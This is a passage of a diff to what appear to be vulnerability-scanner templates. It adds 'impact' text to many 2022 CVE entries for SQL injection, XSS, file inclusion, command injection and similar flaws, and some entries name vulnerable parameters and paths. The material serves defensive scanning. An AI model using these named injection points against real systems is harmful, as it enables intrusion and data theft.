of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Directory Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index e2d8b54aec..36df394b7e 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index 7316bc3a16..6f61be2538 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 93abca2c06..522d9d30c6 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: high description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system. remediation: | Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index d1bc57b373..daf701a2d9 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation. + impact: | + Remote code execution can lead to unauthorized access, data leakage, and complete system compromise. remediation: | Upgrade to a patched version of Node.js Embedded JavaScript (3.1.7 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index b3b04a37c8..9be49b473a 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -6,6 +6,8 @@ info: severity: high description: | HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11 are susceptible to server-side request forgery. When redirects are returned by HTTP health check endpoints, Consul follows these HTTP redirects by default. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send crafted requests to internal resources, leading to unauthorized access or information disclosure. remediation: 1) HTTP + interval health check configuration provides a disable_redirects option to prohibit this behavior. 2) Fixed in 1.9.17, 1.10.10, and 1.11.5. reference: - https://discuss.hashicorp.com/t/hcsec-2022-10-consul-s-http-health-check-may-allow-server-side-request-forgery/38393 diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 85285b775c..c573fe41f6 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade Nagios XI to version 5.8.5 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index e3c1bae639..b3d42cd671 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00. reference: diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml index 7346cd4105..83a7de7652 100644 --- a/http/cves/2022/CVE-2022-29299.yaml +++ b/http/cves/2022/CVE-2022-29299.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-29301.yaml b/http/cves/2022/CVE-2022-29301.yaml index a8662ea832..45e7b4b54a 100644 --- a/http/cves/2022/CVE-2022-29301.yaml +++ b/http/cves/2022/CVE-2022-29301.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact. reference: diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 85eefe095b..e9a86d2563 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. remediation: | Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index b545f4805f..a9912bacfa 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a newer version of kkFileView to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index 6924e709d0..5db825a5be 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index ff44439f5a..d27176df86 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade WordPress Elementor Website Builder to version 3.5.6 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 2afdc9a679..0eaf6dc3fe 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to upload malicious files and execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by WSO2 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index abf867a071..73743fc9e5 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 48adfcfad6..8662772349 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system. remediation: | Upgrade to the latest version of iSpy (7.2.2.1 or higher) which includes a fix for the authentication bypass vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index 73dcefd465..574a6ce84a 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 196945fe45..a99df4f368 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index fca46b0abf..6cb7700536 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 9d7e17b7bc..3ce05414b9 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 22e4bb2a4d..be442db97c 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 930173625c..8ead5cc815 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 21bc9d57c3..47ad00e9a8 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.4.12 reference: - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index b5ea8dde24..28a54e6b45 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of Atmail that addresses this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 800841dfa3..84ea3dff25 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index 189bd39f24..c654658434 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Users are advised to upgrade to latest version. reference: - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 99aa2a1539..058617c1a2 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. remediation: | Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268). reference: diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index b1871dfe7f..50801357fc 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the device. remediation: | Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index b420146157..30fc67c882 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Haraj 3.7 contains a cross-site scripting vulnerability in the User Upgrade Form. An attacker can inject malicious script and thus steal authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index d1e42fbf5e..aacf0272fb 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index 719d2d59c0..769c2b312f 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -5,6 +5,8 @@ info: author: aringo severity: high description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server. remediation: Upgrade to at least version 8.7.5 or higher reference: - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/ diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index 90f732d091..ae6d35fe22 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Nortek Linear eMerge E3-Series devices before 0.32-08f are susceptible to remote command injection via ReaderNo. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. NOTE: this vulnerability exists because of an incomplete fix for CVE-2019-7256. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade to a patched version of Nortek Linear eMerge E3-Series (>=0.32-08f) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index aedacf04fa..1da7f79426 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + impact: | + The impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations. reference: diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 891dd7e923..d8c8656961 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series. reference: diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index ebcc7805fe..683f05fa6b 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade to a patched version of pfSense pfBlockerNG (>=2.1..4_27) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index 8ec9ceae2c..6b58608748 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as login credentials or network configuration. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 08e72d3d06..0891ed43de 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as router configuration settings and user credentials. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index c916109adf..a026191ea0 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 93cff57e53..56d76990a0 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of Codoforum. reference: diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index 61eb517636..d26b630b60 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index cfd7732726..39dc3de3ba 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 53c9d07c13..48e02c6f2e 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 653f5b5a8d..fa6b7132c4 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 8c24d5e57d..cfd6042caf 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team. + impact: | + 